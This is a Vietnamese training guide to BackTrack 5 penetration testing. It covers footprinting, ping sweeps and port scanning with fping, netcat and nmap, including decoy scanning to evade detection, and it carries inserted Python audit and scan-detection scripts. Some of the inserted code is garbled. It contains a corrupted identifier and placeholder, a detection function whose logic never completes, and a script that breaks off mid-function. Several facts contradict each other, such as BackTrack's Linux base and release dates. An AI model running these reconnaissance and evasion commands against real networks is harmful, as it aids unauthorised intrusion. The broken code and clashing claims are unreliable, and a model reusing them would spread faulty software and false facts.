
GUIDE TO USING BACKTRACK 5 FOR EXPLOITING NETWORK VULNERABILITIES AT THE ATHENA CENTER

FOREWORD

First, we would like to sincerely thank Mr. V Thng, Director of the Athena Network Administration and Network Security Training Center, and Mr. L nh Nhn for their enthusiastic help in completing this document. We also thank the consulting and technical support staff at the Athena Network Administration and Network Security Training Center for their support in completing this network security project on schedule. Respectfully, the project team: Nguyn Sn Kh, Tn Pht, Nguyn Cao Thng.

TABLE OF CONTENTS

Introductory Chapter: INTRODUCTION TO BACKTRACK 5 ... 6
  I. Introduction ... 6
  II. Purpose ... 6
  III. Where to download Backtrack ... 7
  IV. Installation ... 8
    1. Live DVD ... 8
    2. Install ... 8
Chapter 1: UNDERSTANDING LAN SECURITY ... 16
  I. Introduction ... 16
  II. System and network security issues ... 16
    1. General issues of system and network security ... 16
    2. Some concepts and the history of system security ... 16
    3. Main types of security vulnerabilities and network attack methods ... 17
Chapter 2: FOOTPRINTING ... 21
  I. Introduction to Footprinting ... 21
  II. Steps in Footprinting ... 21
    1. Determine our scope ... 21
    2. Publicly available information ... 21
    3. Whois and DNS enumeration ... 21
    4. DNS interrogation ... 22
    5. Network reconnaissance ... 22
  III. Footprinting methods ... 22
  IV. Footprinting tools ... 25
    1. Sam Spade ... 25
    2. Super Email Spider ... 26
    3. VisualRoute Trace ... 27
    4. Maltego ... 27
Chapter 3: SCANNING ... 28
  I. Introduction ... 28
  II. Functions ... 28
    1. Is the system alive? ... 28
    2. Determine which services are running or listening ... 31
    3. Determining the operating system ... 37
Chapter 4: ENUMERATION ... 39
  I. What is Enumeration? ... 39
  II. Banner Grabbing ... 39
  III. Enumerating network services ... 39
    1. HTTP fingerprinting ... 39
    2. DNS enumeration ... 42
    3. NetBIOS name ... 44
Chapter 5: PASSWORD CRACKING ... 45
  I. Introduction ... 45
  II. Password cracking techniques ... 45
    1. Dictionary Attacks/Hybrid Attacks ... 45
    2. Brute Forcing Attacks ... 45
    3. Syllable Attacks/Pre-Computed Hashes ... 45
  III. Common attack types ... 45
    1. Active Password Cracking ... 45
    2. Passive Password Cracking ... 46
    3. Offline Password Cracking ... 46
  IV. Password cracking tools ... 46
    1. Hydra ... 46
    2. Medusa ... 48
  V. Password cracking against protocols ... 51
    1. HTTP (HyperText Transfer Protocol) ... 51
    2. SSH (Secure Shell) ... 58
    3. SMB (Server Message Block) ... 61
    4. RDP (Remote Desktop Protocol) ... 64
Chapter 6: SYSTEM HACKING ... 67
  I. INTRODUCTION TO METASPLOIT ... 67
    1. Introduction ... 67
    2. Components of Metasploit ... 67
    3. Using the Metasploit Framework ... 67
    4. Introduction to the Meterpreter payload ... 68
    5. Countermeasures ... 70
  II. The MS10-046 (2286198) vulnerability ... 70
    1. Introduction ... 70
    2. Attack steps ... 71
    3. Countermeasures ... 79
  III. The BYPASSUAC vulnerability ... 80
    1. Introduction ... 80
    2. Attack steps ... 80
    3. Countermeasures ... 85
Chapter 7: WEB HACKING WITH DVWA ... 86
  I. Introduction ... 86
  II. Installing DVWA on Backtrack ... 86
    1. Download and install XAMPP ... 86
    2. Download and install DVWA ... 88
  III. Attack techniques on DVWA ... 92
    1. XSS (Cross-Site Scripting) ... 92
    2. SQL Injection ... 100
REFERENCES ... 106

Introductory Chapter: INTRODUCTION TO BACKTRACK 5

I. Introduction

Backtrack is a Live DVD Linux distribution developed for penetration testing. In Live DVD form we can use Backtrack directly from the DVD without installing it on our machine. Backtrack can also be installed on a hard disk and used as an operating system. Backtrack is the merger of three different Linux penetration-testing distributions: IWHAX, WHOPPIX and Auditor. In its current version (5), Backtrack is based on the Ubuntu 11.10 Linux distribution. As of 19 July 2010, Backtrack 5 had been downloaded by more than 1.5 million users. The latest release is Backtrack 5 R2.

II. Purpose

Backtrack as a toolkit has a fairly long development history across several different Linux bases. The current version uses the Slackware Linux distribution (Tomas M., www.slax.org). Backtrack continuously updates its tools, drivers and so on; at present it carries over 300 tools for security research. Backtrack is the combination of two well-known security testing toolkits, Whax and Auditor.

Backtrack 5 contains a number of tools that can be used during our penetration test. The penetration-testing tools in Backtrack 5.0 can be classified as follows:

Information gathering: this category contains tools that can be used to obtain information about a target's DNS, routing, e-mail addresses, websites, mail servers and so on. This information is gathered from what is publicly available on the Internet, without touching the target environment.
Network mapping: this category contains tools that can be used to check which hosts exist, gather OS information and the applications used by the target, and also to do port scanning.
Vulnerability identification: in this category we find tools that scan for vulnerabilities (in general) and in Cisco devices. It also contains tools for exercising and analysing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
Web application analysis: this category contains tools that can be used to monitor and audit web applications.
Radio network analysis: to examine wireless networks, Bluetooth and radio-frequency identification (RFID), we can use the tools in this category.
Penetration: this category contains tools that can be used to exploit the vulnerabilities found on target machines.
Privilege escalation: after exploiting vulnerabilities and gaining access to the target machines, we can use the tools in this category to raise our privileges to the highest level.
Maintaining access: the tools in this category help us keep access to the target machines. We may need the highest privileges before we can install tools to maintain access.
Voice Over IP (VOIP): to analyse VOIP we can use the tools in this category.
Digital forensics: in this category we find tools that can be used for digital analysis, such as acquiring hard-disk images, examining file structures, and analysing disk images. To use the tools in this category we can choose Start Backtrack Forensics in the boot menu. Sometimes this requires mounting the internal hard disk and swap files read-only to preserve their integrity.
Reverse engineering: this category contains tools that can be used to debug a program or disassemble an executable file.

III. Where to download Backtrack

We can download Backtrack 5 at: www.backtrack-linux.org/downloads/. Both a VMware image and an ISO file are available.

IV. Installation

1. Live DVD

If we want to use Backtrack without installing it on the hard disk, we can burn the ISO image to a DVD and boot the computer from that DVD; Backtrack then runs from the disc. The advantage of using Backtrack as a Live DVD is that it is very easy to do and we need not disturb the machine's current configuration. This method also has some drawbacks, however. Backtrack may not work with all hardware, and any configuration changes made to get the hardware working are not saved on the Live DVD. It is also slow, because the computer has to load programs from the DVD.

2. Install

a) Installing on a physical machine:

We need to prepare a partition on which to install Backtrack. Then boot the Backtrack Live DVD. At the login screen, use the username root and the password toor. To enter graphical mode, type startx, which brings up the Backtrack 5 desktop. To install Backtrack 5 to the hard disk, choose the file named install.sh on the desktop and proceed with the installation. If that file cannot be found, we can use ubiquity to install instead: open a Terminal and type ubiquity.

The installer window then appears. Answer a few questions such as the city we live in, the keyboard layout and the partition to install on, then proceed with the installation.

b) Installing in a virtual machine:

The advantage is that we need not prepare a partition for Backtrack and can use another OS at the same time. The drawbacks are slower speed and no wireless support except for USB wireless adapters. We can use the VMware image provided by BackTrack, which gives us BackTrack in a virtual machine quickly and easily. The configuration in the VMware image is memory 768MB, hard disk 30GB, Network NAT. To use the physical network card, the Network setting must be changed to Bridged. Below are some screenshots from installing BackTrack in a VMware virtual machine.

[Figure: Create a new virtual machine and insert the BackTrack disc.]

[Figure: The BackTrack boot screen.]

[Figure: Type startx to enter graphical mode in BackTrack.]

[Figure: To install, click the Install BackTrack file on the Desktop.]

[Figure: Choose the language and click Forward to continue.]

[Figure: Choose our location and click Forward to continue.]

[Figure: Choose the keyboard layout and click Forward to continue.]

[Figure: Choose the partition to install on.]

[Figure: Click Install to begin the installation.]

[Figure: The installation starts.]

[Figure: When it finishes, simply reboot and the installation is done.]

Chapter 1: UNDERSTANDING LAN SECURITY

I. Introduction

Computer network security is entirely a human matter, so establishing a legal framework and specific working rules is necessary. The legal framework may comprise the provisions of state law and sub-statutory documents, while specific regulations are set by each organization to suit its own circumstances: regulations on personnel, on computer use, on software use, and so on. Security for a computer network is therefore best assured when the policy-and-people solution is carried out thoroughly. In short, computer network security is a large problem that demands an overall solution, covering not only software and hardware but also policy and people. It must be carried out regularly and continuously and can never be finished, because new issues keep arising over time. Nevertheless, with sensible overall solutions, and above all by handling the policy-and-people problem well, we can make ourselves considerably safer.

II. System and network security issues

1. General issues of system and network security

The general characteristic of a network is that it is shared by many users and geographically distributed, so protecting resources (against loss or improper use) is much more complex than in the environment of a single computer or a single user. The network administrator's work must ensure that information on the network is trustworthy and used for its intended purpose and by the intended parties, while keeping the network running stably and free from attack by saboteurs. In practice, however, no network can guarantee absolute safety: however well a system is protected, there will be times when it is defeated by someone with bad intentions.
2. Some concepts and the history of system security

a) Network attackers (intruders)

Attackers are individuals or organizations who use knowledge of networks and destructive tools (hardware or software) to probe for weaknesses and security holes in a system, then carry out intrusions and seize resources illegally. Some kinds of network attacker:

Hacker: someone who breaks into a network illegally using password-cracking tools or by exploiting weaknesses in the system's access components.
Masquerader: someone who forges information on the network, such as IP addresses, domain names or user identities.
Eavesdropper: someone who listens in on network traffic using sniffer tools and then uses analysis and debugging tools to extract valuable information.

Network attackers may have many different goals, such as stealing information of economic value, deliberately sabotaging the network, or simply acting thoughtlessly.
b) Security vulnerabilities

Security vulnerabilities are weaknesses in a system, or hidden in a service, that an attacker can use to break into the system illegally and carry out destructive actions or seize resources illegitimately. Vulnerabilities have many causes: faults in the system itself or in the supplied software, or weak administrators who do not understand the services they provide in depth. Vulnerabilities affect a system to different degrees: some only affect the quality of the service provided, others affect the whole system or destroy it.
c) Security policy

A security policy is the set of rules that apply to everyone involved in administering the network and using its resources and services. Each situation needs a different security policy. A security policy lets users know their responsibilities for protecting network resources, and also helps the network administrator put effective safeguards in place when equipping, configuring and monitoring the operation of the system and network.
3. Main types of security vulnerabilities and network attack methods

a) Types of vulnerabilities

Many organizations have classified the particular kinds of vulnerability. According to the US Department of Defense, vulnerabilities fall into three classes:

Class C vulnerabilities allow denial-of-service (DoS) attacks. Their danger level is low: they only affect the quality of service, stalling or interrupting the system, without damaging data or granting illegitimate access. DoS is a form of attack that uses the Internet-layer protocols of the TCP/IP suite to stall the system so that legitimate users are denied access to or use of it. Services with vulnerabilities that permit DoS attacks can be upgraded or repaired with newer versions from the vendor. At present there is no fully effective remedy for this kind of attack, because the design of the Internet layer (IP) in particular, and of the TCP/IP suite in general, already carries the latent risk of such vulnerabilities.

Class B vulnerabilities allow a user to gain additional rights on the system without validity checks, leading to the loss of information that must be kept confidential. They are usually found in applications on the system and have a medium danger level, higher than class C. They allow an internal user to obtain higher privileges or illegitimate access, and usually appear in services on the system. A local user here means someone who already has access to the system with certain limited rights. Another form of class B vulnerability occurs in programs written in C. C programs commonly use a buffer, a region of memory that holds data before it is processed; the programmer typically reserves the buffer before assigning memory space to each block of data. For example, a program that reads a user's name may declare the field as 20 characters long with: char first_name[20]; This declaration lets the user enter at most 20 characters, and the input is first stored in the buffer. If the user enters more than 20 characters the buffer overflows, and the excess characters land outside the buffer where we cannot control them. Attackers can exploit such holes by entering specially crafted characters to execute certain commands on the system. These holes are usually exploited by users already on the system to obtain root privileges illegitimately. To limit class B vulnerabilities, the system configuration and its programs must be tightly controlled.

Class A vulnerabilities allow an outsider to gain illegitimate access to the system and can destroy the whole system. Their danger level is very high, threatening the integrity and confidentiality of the system. They usually appear in poorly administered systems or where the network configuration is not under control. They are extremely dangerous because they already exist in the software in use; an administrator who does not understand the services and software in depth may overlook them. Security newsgroup announcements must therefore be checked regularly to detect such vulnerabilities. A range of older program versions still in use have class A vulnerabilities, such as FTP, Gopher, Telnet, Sendmail, ARP and finger.

b) Common forms of network attack

Scanner
A scanner is a program that automatically probes for and detects security weaknesses on a local workstation or a remote one. A saboteur using a scanner can discover security holes on a server even from afar. Its mechanism is to probe for and detect the TCP/UDP ports in use on the target system and the services running on it. The scanner records the responses from the remote system corresponding to each service it detects, and from these it can find the system's weaknesses. The requirements for a scanner to work are a TCP/IP-capable environment and a system connected to the Internet. Scanners play an important role in a security system, because they can detect the weak points of a network.

Password Cracker
A password cracker is a program able to decode an encrypted password or to disable a system's password protection. Different crackers work on different principles. Some generate a limited word list, apply an encryption algorithm to it and compare the result with the encrypted password to be cracked, generating a further list according to the program's logic. When a match with the encrypted password is found, the attacker has the password in plain text, and the plaintext password is normally written to a file. The remedy against this kind of attack is to build a sound password-protection policy.

Sniffer
Sniffers are tools (hardware or software) that capture the information flowing over a network and extract the valuable data being exchanged. A sniffer can capture the traffic exchanged among many workstations, capturing packets from the IP layer downward. Since the IP-layer protocols are publicly defined and the header fields clearly structured, decoding these packets is not difficult. The purpose of sniffer programs is to put the Ethernet network card, where the network's packets are exchanged, into promiscuous mode and thereby "catch" the information. Sniffers can capture all the traffic exchanged on the network because of the broadcast principle of Ethernet. Setting up a sniffer system is not simple, however, because it requires breaking into the network and installing the sniffer software, and sniffer programs also require the user to understand network architecture and protocols in depth. Detecting that a system is being sniffed is not simple either, because the sniffer operates at a very low layer and does not affect the applications or services the system provides. Nevertheless, building countermeasures against sniffers is not too hard if we follow security principles such as: not letting strangers access devices on the system; managing the system configuration tightly; and establishing highly secure connections through encryption mechanisms.

Trojans
A Trojan is a program running illegitimately on a system while posing as a legitimate program. It can run because a legitimate program's code has been altered into illegitimate code. Viruses, for example, are a typical kind of Trojan: virus programs usually hide code fragments inside legitimately used programs, and when those programs are launched the hidden code executes and performs functions the user is unaware of, such as stealing passwords or copying files without the user's knowledge. A Trojan program does one of the following: it performs certain functions, or helps its programmer discover important or personal information on a system or on just a few of its components; or it hides certain functions, or helps its programmer discover important or personal information on a system or on just a few of its components. Some Trojans do both. Some can even destroy the system by wrecking the data on the hard disk, although today such Trojans are easily detected and hard to make effective. More serious cases occur when attackers create security holes through Trojans, obtain root on the system, and use that privilege to destroy part or all of the system, or to alter log files and install further Trojans that the administrator cannot detect. The consequences are very serious, and the administrator has no choice but to reinstall the whole system.

Chapter 2: FOOTPRINTING

I. Introduction to Footprinting

Footprinting is a technique for gathering information about a business, individual or organization. It is one of the three phases that must be carried out to perform an attack: an attacker spends 90% of the effort gathering and searching for information and 10% performing the attack. The result of Footprinting is basic information about the target: name, company address, website, company members, network diagram, and so on. Information to look for:
Internet: domain, network blocks, IP addresses, TCP or UDP services, system enumeration, ACLs, IDSes, ...
Intranet: ...
Remote access: remote system type, ...
Extranet: connection origination and destination, ...

II. Steps in Footprinting

Footprinting consists of the following steps:

1. Determine our scope

The first order of business is to determine the scope of our footprinting activities. Identifying every entity in an organization can be a daunting task, but hackers have no sympathy for our struggle: they exploit weaknesses in whatever form they take. We do not want hackers to know much about our security posture.
2. Publicly available information

The amount of information readily available about us, our organization and anything else we can imagine is nothing short of astonishing. It may include the company website; related organizations; physical location; employee details; current events; and security and privacy policies.
3. Whois and DNS enumeration

Look up detailed information about IP addresses, name servers and DNS servers.

4. DNS interrogation

After identifying all related domains, we start querying DNS. DNS is a distributed database used to map IP addresses to hostnames. If DNS is not configured securely, there is a good chance of obtaining information leaked from the organization.
5. Network reconnaissance

Now that we have identified the candidate networks, we can determine the network topology and the likely paths into the network.
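The DNS interrogation step above turns on what the organization itself publishes. The following audit script is an added example, not part of the original document: it parses a small BIND-style zone (the sample zone, the domain example.test and its records are constructed for this example) and reports the records an outsider would harvest: RFC 1918 addresses in a public zone, HINFO records, and TXT records carrying version strings. It is meant to be run by the zone's own administrator before the zone is published.

```python
"""Audit a DNS zone for records that leak internal information.

Added example, not from the original document. Parses a simplified
BIND-style zone and flags records useful to reconnaissance.
"""
import ipaddress
import re

# Constructed sample zone for a hypothetical domain; not a real deployment.
SAMPLE_ZONE = """\
$ORIGIN example.test.
$TTL 3600
@           IN  SOA   ns1 hostmaster 2024010101 7200 900 1209600 300
@           IN  NS    ns1
@           IN  MX 10 mail
ns1         IN  A     203.0.113.10
www         IN  A     203.0.113.20
mail        IN  A     203.0.113.25
mail        IN  HINFO "Dell PowerEdge" "Ubuntu 10.04"   ; hardware/OS disclosure
intranet    IN  A     10.0.5.12          ; RFC 1918 address in a public zone
backup-db   IN  A     192.168.1.40
vpn         IN  TXT   "Cisco ASA 8.2 gateway"
"""

# Address ranges that should never appear in an externally visible zone.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]
VERSION_RE = re.compile(r"\b\d+\.\d+(\.\d+)?\b")


def parse_zone(text):
    """Return a list of (owner, type, rdata) tuples from a simple zone file.

    Handles $ORIGIN, $TTL, ';' comments, optional TTL/class fields and
    relative owner names; it does not cover parentheses or $INCLUDE.
    """
    origin = "."
    records = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if not line:
            continue
        if line.startswith("$ORIGIN"):
            origin = line.split()[1]
            continue
        if line.startswith("$TTL"):
            continue
        fields = line.split()
        owner = fields[0]
        if owner == "@":
            owner = origin
        elif not owner.endswith("."):
            owner = f"{owner}.{origin}"
        rest = fields[1:]
        # Skip the optional TTL and class tokens to reach the record type.
        while rest and (rest[0].isdigit() or rest[0] in ("IN", "CH", "HS")):
            rest.pop(0)
        records.append((owner, rest[0].upper(), " ".join(rest[1:])))
    return records


def audit_zone(text):
    """Return findings as (severity, owner, reason) for a zone's records."""
    findings = []
    for owner, rtype, rdata in parse_zone(text):
        if rtype in ("A", "AAAA"):
            addr = ipaddress.ip_address(rdata)
            if any(addr in net for net in INTERNAL_NETS):
                findings.append(("high", owner, f"internal address {rdata} published"))
        elif rtype == "HINFO":
            findings.append(("medium", owner, "HINFO record discloses hardware/OS"))
        elif rtype == "TXT" and VERSION_RE.search(rdata):
            findings.append(("medium", owner, "TXT record contains a version string"))
    return findings


if __name__ == "__main__":
    for severity, owner, reason in audit_zone(SAMPLE_ZONE):
        print(f"[{severity}] {owner}: {reason}")
```

Run it against a zone exported from the primary name server. Anything it flags as high is data that belongs in an internal-only view of the zone, not in the one the Internet can query or transfer.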

III. Footprinting methods

There are two ways to carry out Footprinting:
Active Footprinting: contacting the target directly to learn the required information.
Passive Footprinting: searching through news articles, websites, or the target's competitors, ...
Websites: www.google.com, http://whois.domaintools.com, www.whois.net, www.arcchive.org, www.tenmien.vn

[Figure: Whois lookup for athena.com.vn]

[Figure: Tenmien.vn lookup]

[Figure: Archive lookup for http://www.microsoft.com]

IV. Footprinting tools

Sam Spade, Super Email Spider, VisualRoute Trace, Google Earth, Whois, Site Digger, Maltego, ...
1. Sam Spade

Lets the user perform actions such as Ping, Nslookup, Whois, Traceroute, ...

2. Super Email Spider

Searches for the e-mail addresses of an organization using search engines: Google, Lycos, iWon, Excite, HotBot, MSN, AOL, ...

3. VisualRoute Trace

Displays the connection paths, addresses and regions that a route passes through.

4. Maltego

A tool for discovering the links between users, agencies, organizations, websites, domains, network ranges, IP addresses, ...

Chapter 3: SCANNING

I. Introduction

If footprinting is finding out where the information lies, scanning is finding all the doors through which that information can be reached. During footprinting we obtained a list of network ranges and IP addresses through various techniques, including whois and ARIN queries. These techniques give security administrators, and hackers, a great deal of valuable information about the target network: IP ranges, DNS servers and mail servers. In this chapter we determine which systems are listening on the network and reachable, using tools and techniques such as ping sweeps and port scans. We can also bypass firewalls by hand to scan systems that are supposedly blocked by filtering rules.

II. Functions

1. Is the system alive?

One of the basic steps in mapping a network is a ping sweep across a network range or set of IP addresses to determine whether the devices or systems are alive. Ping is usually used to send ICMP ECHO packets to a target system and attempt to receive an ICMP ECHO REPLY, which shows the system is alive. Ping is acceptable for counting the live systems in small and medium networks (a class C has 254 addresses and a class B 65534), but it can take hours or days to finish for a class A network of 16277214 addresses.
a) Network Ping Sweeps

Network pinging is the act of sending various kinds of network traffic to a target and analysing the results. Pinging uses ICMP (Internet Control Message Protocol), but it can also use TCP or UDP to find live hosts. To perform an ICMP ping sweep we can use fping, nmap, ...

fping -a -g 192.168.10.1 192.168.10.10
-a: show only hosts that are alive
-g: the address range, given as 192.168.10.0/24 or as a start and end address as above

nmap -sP -PE 192.168.10.0/24
-sP: ping scan
-PE: ICMP echo ping

Countermeasure: we can use pingd to limit all ICMP ECHO and ICMP ECHO REPLY traffic at the host level. This is achieved by removing ICMP ECHO handling support from the system kernel; essentially it provides an access-control mechanism at the system level.
b) ICMP queries

Ping sweeps (ICMP ECHO packets) are only the tip of the iceberg when it comes to the ICMP information about a system. We can gather many kinds of valuable information simply by sending ICMP packets. We can ask a device for its network mask with an Address Mask Request. The netmask is important because from it we can work out all of the target's addresses, the default gateway and the broadcast address. Knowing the default gateway, we can attack the router; the same goes for the broadcast address. Not all routers support Timestamp and Netmask requests, however.

Countermeasure: block the ICMP types that disclose information at the border router (the router facing the ISP). To keep the exposure to a minimum we should use access lists (ACLs):
access-list 101 deny icmp any any 13 // timestamp request
access-list 101 deny icmp any any 17 // address mask request
Because an IOS access list ends with an implicit deny, these two lines must be followed by permit entries for the traffic the interface is meant to carry.

2. Determine which services are running or listening.

a) Port Scanning

Port scanning is the process of sending packets to TCP and UDP ports on the target system to determine which services are running or in a listening state. Identifying listening ports is essential for identifying the running services. In addition, we can determine the type and version of the operating system and the applications in use.
b) Scan types

Before port scanning we should review the available scanning methods:

TCP Connect scan: connects to the target port and completes the full three-way handshake (SYN, SYN/ACK, ACK). It is easily detected by the target system. It uses system calls instead of raw packets and is typically used by unprivileged Unix users, for whom a SYN scan is not possible.
TCP SYN scan: does not open a full connection; it only sends the SYN packet (the first step of the three-way handshake) to the target. If a SYN/ACK comes back, we know the port is listening; if an RST/ACK comes back, the port is not listening. This technique is harder to detect than TCP connect because it leaves no record on the target machine. One drawback is that it can create a denial-of-service condition if too many half-open connections are created, so it is safe only as long as that does not happen.
TCP ACK scan: used to map out firewall rule sets. It can help determine whether the firewall is a simple packet filter that allows established connections or an advanced filter. It cannot tell open ports from closed ones, however.
TCP Window scan: like the ACK scan, except that it can distinguish open ports from closed ones.
UDP scan: sends a UDP packet to the target port. If the target replies with an ICMP port unreachable message, the port is closed; if no such message is received, the port is open. UDP scanning is very slow, however, when scanning a device behind strict packet filtering.
TCP FIN, XMAS, NULL scans: these specialise in slipping past firewalls to discover the systems behind them, but they depend heavily on how the target system handles the packets, and some targets (typically Windows) give no indication at all.
Strobe: highly reliable, but supports only TCP, not UDP.
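The ping sweep, the ICMP timestamp/address-mask queries and the scan types above all leave a recognisable pattern in packet logs. The detector below is an added example, not part of the original document, and works on a constructed, simplified per-packet log format ("time src dst proto dport flags", where for ICMP the dport column carries the ICMP type); the sample lines, the addresses and the thresholds are all assumptions to be tuned for a real sensor. It flags one source probing many hosts with ICMP echo, ICMP type 13/17 requests, a SYN scan across many ports of one host, and FIN/NULL/XMAS probes.

```python
"""Detect ping sweeps, ICMP information queries and port scans in packet logs.

Added example, not from the original document. Input is a constructed,
simplified log: "time src dst proto dport flags"; for ICMP lines the
dport column holds the ICMP type and flags is "-".
"""
from collections import defaultdict

# Constructed sample: one host pings part of a /24, asks for timestamps and
# netmasks, then SYN-scans and FIN/NULL/XMAS-probes a single server.
SAMPLE_LOG = """\
10:00:01 192.168.10.5 192.168.10.1 ICMP 8 -
10:00:01 192.168.10.5 192.168.10.2 ICMP 8 -
10:00:01 192.168.10.5 192.168.10.3 ICMP 8 -
10:00:02 192.168.10.5 192.168.10.4 ICMP 8 -
10:00:02 192.168.10.5 192.168.10.6 ICMP 8 -
10:00:02 192.168.10.5 192.168.10.7 ICMP 8 -
10:00:03 192.168.10.5 192.168.10.1 ICMP 13 -
10:00:03 192.168.10.5 192.168.10.1 ICMP 17 -
10:00:05 192.168.10.5 192.168.10.102 TCP 21 S
10:00:05 192.168.10.5 192.168.10.102 TCP 22 S
10:00:05 192.168.10.5 192.168.10.102 TCP 23 S
10:00:05 192.168.10.5 192.168.10.102 TCP 25 S
10:00:05 192.168.10.5 192.168.10.102 TCP 80 S
10:00:05 192.168.10.5 192.168.10.102 TCP 139 S
10:00:05 192.168.10.5 192.168.10.102 TCP 445 S
10:00:06 192.168.10.5 192.168.10.102 TCP 80 F
10:00:06 192.168.10.5 192.168.10.102 TCP 80 -
10:00:06 192.168.10.5 192.168.10.102 TCP 80 FPU
10:00:07 192.168.10.9 192.168.10.102 TCP 80 S
10:00:07 192.168.10.9 192.168.10.102 TCP 443 S
"""

SWEEP_MIN_HOSTS = 5   # distinct ICMP echo targets from one source (assumed threshold)
SCAN_MIN_PORTS = 6    # distinct SYN-probed ports on one destination (assumed threshold)
INFO_ICMP = {"13": "timestamp request", "17": "address mask request"}
STEALTH_FLAGS = {"F": "FIN scan", "-": "NULL scan", "FPU": "XMAS scan"}


def parse_log(text):
    """Yield one dict per non-empty line of the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        time, src, dst, proto, dport, flags = line.split()
        yield {"time": time, "src": src, "dst": dst,
               "proto": proto, "dport": dport, "flags": flags}


def detect(text):
    """Return a sorted list of (kind, src, detail) alerts for the log."""
    echo_targets = defaultdict(set)   # src -> {dst that received ICMP echo}
    syn_ports = defaultdict(set)      # (src, dst) -> {ports that received SYN}
    alerts = set()
    for pkt in parse_log(text):
        if pkt["proto"] == "ICMP":
            if pkt["dport"] == "8":
                echo_targets[pkt["src"]].add(pkt["dst"])
            elif pkt["dport"] in INFO_ICMP:
                alerts.add(("icmp-info-query", pkt["src"],
                            f"{INFO_ICMP[pkt['dport']]} to {pkt['dst']}"))
        elif pkt["proto"] == "TCP":
            if pkt["flags"] == "S":
                syn_ports[(pkt["src"], pkt["dst"])].add(pkt["dport"])
            elif pkt["flags"] in STEALTH_FLAGS:
                alerts.add(("stealth-scan", pkt["src"],
                            f"{STEALTH_FLAGS[pkt['flags']]} on {pkt['dst']}:{pkt['dport']}"))
    # Aggregate counters into alerts once the whole window has been read.
    for src, targets in echo_targets.items():
        if len(targets) >= SWEEP_MIN_HOSTS:
            aler極 = None  # placeholder removed below
    return sorted(alerts)
```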

c) Identifying running TCP and UDP services

Netcat is a simple Unix network utility that reads and writes data across network connections using TCP/IP. It is designed as a reliable "back-end" tool that can be used directly or driven easily by other programs and scripts. It is also a feature-rich network debugging and exploration tool.

nc -v -z -w2 192.168.10.102 1-4000
-v: verbose output
-z: zero-I/O mode, sends no data and only emits a probe packet
192.168.10.102: the host
1-4000: the ports to scan

Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Many network and system administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, which packet filters or firewalls are in use, and many other characteristics. It was designed to rapidly scan large networks but works fine against single hosts. Nmap runs on all major operating systems, and official binary packages are available for Linux, Windows and Mac OS X. The simplest usage, with no options:

nmap 192.168.10.0/24

The process runs as follows:

a. Convert <target> from a hostname to an IPv4 address using DNS; if it is already an IP address no conversion is needed.
b. Ping the host, by default with an ICMP echo request and a TCP ACK packet to port 80, to determine whether it is up. If it is not, nmap exits with a message. We can use ping-null (-PN) to skip this step.
c. Convert the target IP back to a name with a reverse DNS query. This can be skipped with the -n option to improve speed and stealth.
d. Run a TCP port scan of the 1000-odd most common ports listed in nmap-services. A SYN scan is performed, but a Connect scan is substituted when a non-root Unix user lacks the privileges needed to send raw packets.
e. Print the results.

Scanning for hosts that are up:

nmap -sP -PE 192.168.10.0/24
-sP: ping scan
-PE: ICMP echo ping

Depending on the complexity of the target network and its hosts, the scan can easily be detected. Nmap offers the ability to spoof the source address with the decoy option -D. It was created to flood the target site with bogus information: the idea behind the option is to run fake scans at the same time as the real one, so that the target system replies to the decoy addresses as well as to our real port scan. Most importantly, the decoy address must be alive; otherwise the SYN scan can lead to a denial-of-service condition.

nmap -sS -PE 192.168.10.0/24 -D 10.10.10.1

d) Countermeasures:

Turn off all unnecessary services. On Unix, we can do this by reviewing the unneeded services in /etc/inetd.conf and disabling the startup scripts for those services. On Windows it is much harder to disable unnecessary services, because of the way Windows operates: TCP ports 139 and 445 provide much of the functionality Windows needs in order to work.
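The scans described above leave a characteristic trace on the target side: one source touching many distinct ports on one host within seconds. The following is an added example, not part of the original document and not Nmap's code, that finds that pattern in firewall log lines; the log format (netfilter-style SRC/DST/DPT fields), the sample lines and the window and threshold values are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format (an assumption, not from the document): one line per new
# inbound TCP connection attempt, as a netfilter LOG rule would record it.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}).*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+).*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for lines that do not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))


def detect_port_scans(lines, window=timedelta(seconds=60), threshold=20):
    """Map (src, dst) -> largest number of distinct destination ports that the
    source touched on that destination inside any sliding time window; only
    pairs reaching `threshold` are returned."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, dport = parsed
            events[(src, dst)].append((ts, dport))

    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # advance the window start so that evs[start..end] spans <= window
            while evs[end][0] - evs[start][0] > window:
                start += 1
            distinct = len({port for _, port in evs[start:end + 1]})
            if distinct >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), distinct)
    return alerts


def constructed_log():
    """Constructed sample (not a real capture): a fast scan, normal web traffic
    and a slow scan that stays under the per-window threshold."""
    base = datetime(2012, 10, 1, 10, 0, 0)
    fmt = "{ts} gw kernel: [FW-IN] SRC={src} DST={dst} PROTO=TCP DPT={dpt}"

    def line(offset, src, dpt):
        return fmt.format(ts=(base + offset).strftime("%Y-%m-%d %H:%M:%S"),
                          src=src, dst="192.168.10.102", dpt=dpt)

    lines = []
    # 40 ports in 20 seconds from one source: a sequential scan
    lines += [line(timedelta(seconds=i // 2), "192.168.10.50", 1 + i) for i in range(40)]
    # repeated web traffic to two ports: benign
    lines += [line(timedelta(seconds=10 * i), "192.168.10.7", 80 if i % 2 else 443) for i in range(30)]
    # one port every five minutes: evades a 60-second window
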